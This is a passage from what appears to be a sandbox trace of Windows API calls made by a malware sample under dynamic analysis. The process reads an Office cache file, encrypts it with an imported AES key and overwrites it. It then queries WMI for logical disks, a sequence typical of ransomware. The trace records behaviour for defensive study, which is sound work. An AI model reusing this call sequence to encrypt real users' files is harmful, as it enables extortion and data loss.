(lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x460 [0195.377] GetFileType (hFile=0x460) returned 0x1 [0195.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69ded94) returned 1 [0195.377] GetFileType (hFile=0x460) returned 0x1 [0195.378] GetFileSize (in: hFile=0x460, lpFileSizeHigh=0x69deea0 | out: lpFileSizeHigh=0x69deea0*=0x0) returned 0x61d [0195.378] ReadFile (in: hFile=0x460, lpBuffer=0x348d748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x69dee4c, lpOverlapped=0x0 | out: lpBuffer=0x348d748*, lpNumberOfBytesRead=0x69dee4c*=0x61d, lpOverlapped=0x0) returned 1 [0195.380] CloseHandle (hObject=0x460) returned 1 [0195.380] CryptAcquireContextW (in: phProv=0x69dedec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x69dedec*=0x7a9c18) returned 1 [0195.382] CryptGenRandom (in: hProv=0x7a9c18, dwLen=0x10, pbBuffer=0x348ea9c | out: pbBuffer=0x348ea9c) returned 1 [0196.447] CryptImportKey (in: hProv=0x7a9c18, pbData=0x35c7ee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x69dedbc | out: phKey=0x69dedbc*=0x77b570) returned 1 [0196.448] CryptContextAddRef (hProv=0x7a9c18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.448] CryptContextAddRef (hProv=0x7a9c18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.448] CryptDuplicateKey (in: hKey=0x77b570, pdwReserved=0x0, dwFlags=0x0, phKey=0x69dedac | out: phKey=0x69dedac*=0x77adf0) returned 1 [0196.448] CryptContextAddRef (hProv=0x7a9c18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.448] CryptSetKeyParam (hKey=0x77adf0, dwParam=0x4, pbData=0x35c7fc0*=0x1, dwFlags=0x0) returned 1 [0196.448] CryptSetKeyParam (hKey=0x77adf0, dwParam=0x1, pbData=0x35c7f8c, dwFlags=0x0) returned 1 [0196.448] CryptEncrypt (in: hKey=0x77adf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x35c7fd0*, pdwDataLen=0x69dee18*=0x620, dwBufLen=0x620 | out: pbData=0x35c7fd0*, pdwDataLen=0x69dee18*=0x620) returned 1 [0196.448] CryptEncrypt (in: hKey=0x77adf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35c8614*, pdwDataLen=0x69dee20*=0x0, dwBufLen=0x10 | out: pbData=0x35c8614*, pdwDataLen=0x69dee20*=0x10) returned 1 [0196.449] CryptDestroyKey (hKey=0x77b570) returned 1 [0196.449] CryptReleaseContext (hProv=0x7a9c18, dwFlags=0x0) returned 1 [0196.449] CryptReleaseContext (hProv=0x7a9c18, dwFlags=0x0) returned 1 [0196.449] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x69de890, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0196.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69ded84) returned 1 [0196.450] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x348 [0196.450] GetFileType (hFile=0x348) returned 0x1 [0196.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69ded80) returned 1 [0196.450] GetFileType (hFile=0x348) returned 0x1 [0196.450] WriteFile (in: hFile=0x348, lpBuffer=0x35ce708*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x69dee14, lpOverlapped=0x0 | out: lpBuffer=0x35ce708*, lpNumberOfBytesWritten=0x69dee14*=0x830, lpOverlapped=0x0) returned 1 [0196.451] CloseHandle (hObject=0x348) returned 1 [0196.454] CoTaskMemAlloc (cb=0x20c) returned 0x74f320 [0196.454] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x74f320 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0196.454] CoTaskMemFree (pv=0x74f320) [0196.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x69de878, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0196.454] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69dedc0 | out: ppv=0x69dedc0*=0x72015c) returned 0x0 [0196.454] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69dedb8 | out: pAptType=0x69dedb8*=1) returned 0x0 [0196.454] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69dedbc | out: ppvObject=0x69dedbc*=0x0) returned 0x80004002 [0196.454] IUnknown:Release (This=0x72015c) returned 0x1 [0196.455] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de728 | out: ppv=0x69de728*=0x6736ec8) returned 0x0 [0196.455] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de940 | out: ppvObject=0x69de940*=0x0) returned 0x80004002 [0196.455] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736ec8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de954 | out: ppvObject=0x69de954*=0x6738af0) returned 0x0 [0196.456] WbemDefPath:IUnknown:Release (This=0x6736ec8) returned 0x0 [0196.456] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de574 | out: ppvObject=0x69de574*=0x6738af0) returned 0x0 [0196.456] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de530 | out: ppvObject=0x69de530*=0x0) returned 0x80004002 [0196.456] WbemDefPath:IUnknown:AddRef (This=0x6738af0) returned 0x3 [0196.456] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69dde8c | out: ppvObject=0x69dde8c*=0x0) returned 0x80004002 [0196.456] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69dde3c | out: ppvObject=0x69dde3c*=0x0) returned 0x80004002 [0196.456] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69dde48 | out: ppvObject=0x69dde48*=0x9820eb8) returned 0x0 [0196.456] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820eb8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69dde50 | out: pCid=0x69dde50*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.456] WbemDefPath:IUnknown:Release (This=0x9820eb8) returned 0x3 [0196.456] CoGetContextToken (in: pToken=0x69ddea8 | out: pToken=0x69ddea8) returned 0x0 [0196.456] CoGetContextToken (in: pToken=0x69de2b0 | out: pToken=0x69de2b0) returned 0x0 [0196.456] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de340 | out: ppvObject=0x69de340*=0x0) returned 0x80004002 [0196.456] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x2 [0196.456] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x1 [0196.456] CoGetContextToken (in: pToken=0x69dec38 | out: pToken=0x69dec38) returned 0x0 [0196.456] CoGetContextToken (in: pToken=0x69deb98 | out: pToken=0x69deb98) returned 0x0 [0196.456] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x69dec68*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x69dec64 | out: ppvObject=0x69dec64*=0x6738af0) returned 0x0 [0196.456] WbemDefPath:IUnknown:AddRef (This=0x6738af0) returned 0x3 [0196.456] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x2 [0196.456] WbemDefPath:IWbemPath:SetText (This=0x6738af0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.456] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x69dedec | out: puCount=0x69dedec*=0x0) returned 0x0 [0196.457] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x69dede8*=0x0, pszText=0x0 | out: puBuffLength=0x69dede8*=0x20, pszText=0x0) returned 0x0 [0196.457] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x69dede8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dede8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.457] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738af0, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0196.457] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x69dedec | out: puCount=0x69dedec*=0x0) returned 0x0 [0196.457] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738af0, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0196.457] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738af0, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0196.457] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x69ded6c | out: puCount=0x69ded6c*=0x0) returned 0x0 [0196.457] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x69ded58 | out: puCount=0x69ded58*=0x2) returned 0x0 [0196.457] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x69ded54*=0x0, pszText=0x0 | out: puBuffLength=0x69ded54*=0xf, pszText=0x0) returned 0x0 [0196.457] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x69ded54*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded54*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.457] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69ded08 | out: ppv=0x69ded08*=0x72015c) returned 0x0 [0196.457] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69ded00 | out: pAptType=0x69ded00*=1) returned 0x0 [0196.457] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69ded04 | out: ppvObject=0x69ded04*=0x0) returned 0x80004002 [0196.457] IUnknown:Release (This=0x72015c) returned 0x1 [0196.458] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de670 | out: ppv=0x69de670*=0x6736f38) returned 0x0 [0196.458] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f38, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de888 | out: ppvObject=0x69de888*=0x0) returned 0x80004002 [0196.458] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f38, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de89c | out: ppvObject=0x69de89c*=0x6738620) returned 0x0 [0196.458] WbemDefPath:IUnknown:Release (This=0x6736f38) returned 0x0 [0196.458] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de4bc | out: ppvObject=0x69de4bc*=0x6738620) returned 0x0 [0196.458] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de478 | out: ppvObject=0x69de478*=0x0) returned 0x80004002 [0196.458] WbemDefPath:IUnknown:AddRef (This=0x6738620) returned 0x3 [0196.458] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69dddd4 | out: ppvObject=0x69dddd4*=0x0) returned 0x80004002 [0196.458] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69ddd84 | out: ppvObject=0x69ddd84*=0x0) returned 0x80004002 [0196.458] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69ddd90 | out: ppvObject=0x69ddd90*=0x9820ed8) returned 0x0 [0196.458] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820ed8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69ddd98 | out: pCid=0x69ddd98*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.458] WbemDefPath:IUnknown:Release (This=0x9820ed8) returned 0x3 [0196.458] CoGetContextToken (in: pToken=0x69dddf0 | out: pToken=0x69dddf0) returned 0x0 [0196.458] CoGetContextToken (in: pToken=0x69de1f8 | out: pToken=0x69de1f8) returned 0x0 [0196.458] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de288 | out: ppvObject=0x69de288*=0x0) returned 0x80004002 [0196.458] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x2 [0196.459] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x1 [0196.459] CoGetContextToken (in: pToken=0x69deb80 | out: pToken=0x69deb80) returned 0x0 [0196.459] CoGetContextToken (in: pToken=0x69deae0 | out: pToken=0x69deae0) returned 0x0 [0196.459] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x69debb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x69debac | out: ppvObject=0x69debac*=0x6738620) returned 0x0 [0196.459] WbemDefPath:IUnknown:AddRef (This=0x6738620) returned 0x3 [0196.459] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x2 [0196.459] WbemDefPath:IWbemPath:SetText (This=0x6738620, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0196.459] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x69ded30 | out: puCount=0x69ded30*=0x2) returned 0x0 [0196.459] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x69ded2c*=0x0, pszText=0x0 | out: puBuffLength=0x69ded2c*=0xf, pszText=0x0) returned 0x0 [0196.459] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x69ded2c*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded2c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.459] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69ded30 | out: ppv=0x69ded30*=0x72015c) returned 0x0 [0196.459] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69ded28 | out: pAptType=0x69ded28*=1) returned 0x0 [0196.459] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69ded2c | out: ppvObject=0x69ded2c*=0x0) returned 0x80004002 [0196.459] IUnknown:Release (This=0x72015c) returned 0x1 [0196.460] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de950 | out: ppv=0x69de950*=0x673d360) returned 0x0 [0196.460] WbemLocator:IUnknown:QueryInterface (in: This=0x673d360, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69deb68 | out: ppvObject=0x69deb68*=0x0) returned 0x80004002 [0196.460] WbemLocator:IClassFactory:CreateInstance (in: This=0x673d360, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb7c | out: ppvObject=0x69deb7c*=0x6737088) returned 0x0 [0196.460] WbemLocator:IUnknown:Release (This=0x673d360) returned 0x0 [0196.460] WbemLocator:IUnknown:QueryInterface (in: This=0x6737088, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de79c | out: ppvObject=0x69de79c*=0x6737088) returned 0x0 [0196.460] WbemLocator:IUnknown:QueryInterface (in: This=0x6737088, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de758 | out: ppvObject=0x69de758*=0x0) returned 0x80004002 [0196.460] WbemLocator:IUnknown:AddRef (This=0x6737088) returned 0x3 [0196.460] WbemLocator:IUnknown:QueryInterface (in: This=0x6737088, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69de0b4 | out: ppvObject=0x69de0b4*=0x0) returned 0x80004002 [0196.460] WbemLocator:IUnknown:QueryInterface (in: This=0x6737088, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69de064 | out: ppvObject=0x69de064*=0x0) returned 0x80004002 [0196.460] WbemLocator:IUnknown:QueryInterface (in: This=0x6737088, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de070 | out: ppvObject=0x69de070*=0x0) returned 0x80004002 [0196.460] CoGetContextToken (in: pToken=0x69de0d0 | out: pToken=0x69de0d0) returned 0x0 [0196.460] CoGetContextToken (in: pToken=0x69de4d8 | out: pToken=0x69de4d8) returned 0x0 [0196.460] WbemLocator:IUnknown:QueryInterface (in: This=0x6737088, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de568 | out: ppvObject=0x69de568*=0x0) returned 0x80004002 [0196.460] WbemLocator:IUnknown:Release (This=0x6737088) returned 0x2 [0196.460] WbemLocator:IUnknown:Release (This=0x6737088) returned 0x1 [0196.460] CoGetContextToken (in: pToken=0x69deb48 | out: pToken=0x69deb48) returned 0x0 [0196.460] CoGetContextToken (in: pToken=0x69deaa8 | out: pToken=0x69deaa8) returned 0x0 [0196.460] WbemLocator:IUnknown:QueryInterface (in: This=0x6737088, riid=0x69deb78*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x69deb74 | out: ppvObject=0x69deb74*=0x6737088) returned 0x0 [0196.460] WbemLocator:IUnknown:AddRef (This=0x6737088) returned 0x3 [0196.460] WbemLocator:IUnknown:Release (This=0x6737088) returned 0x2 [0196.461] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x69ded0c | out: puCount=0x69ded0c*=0x2) returned 0x0 [0196.461] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=8, puBuffLength=0x69ded08*=0x0, pszText=0x0 | out: puBuffLength=0x69ded08*=0xf, pszText=0x0) returned 0x0 [0196.461] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=8, puBuffLength=0x69ded08*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded08*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.461] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x69debe4 | out: ppv=0x69debe4*=0x6737078) returned 0x0 [0196.461] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737078, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x69dec78 | out: ppNamespace=0x69dec78*=0x67481b4) returned 0x0 [0197.281] WbemLocator:IUnknown:QueryInterface (in: This=0x67481b4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb14 | out: ppvObject=0x69deb14*=0x780be4) returned 0x0 [0197.281] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x780be4, pProxy=0x67481b4, pAuthnSvc=0x69deb64, pAuthzSvc=0x69deb60, pServerPrincName=0x69deb58, pAuthnLevel=0x69deb5c, pImpLevel=0x69deb4c, pAuthInfo=0x69deb50, pCapabilites=0x69deb54 | out: pAuthnSvc=0x69deb64*=0xa, pAuthzSvc=0x69deb60*=0x0, pServerPrincName=0x69deb58, pAuthnLevel=0x69deb5c*=0x6, pImpLevel=0x69deb4c*=0x2, pAuthInfo=0x69deb50, pCapabilites=0x69deb54*=0x1) returned 0x0 [0197.281] WbemLocator:IUnknown:Release (This=0x780be4) returned 0x1 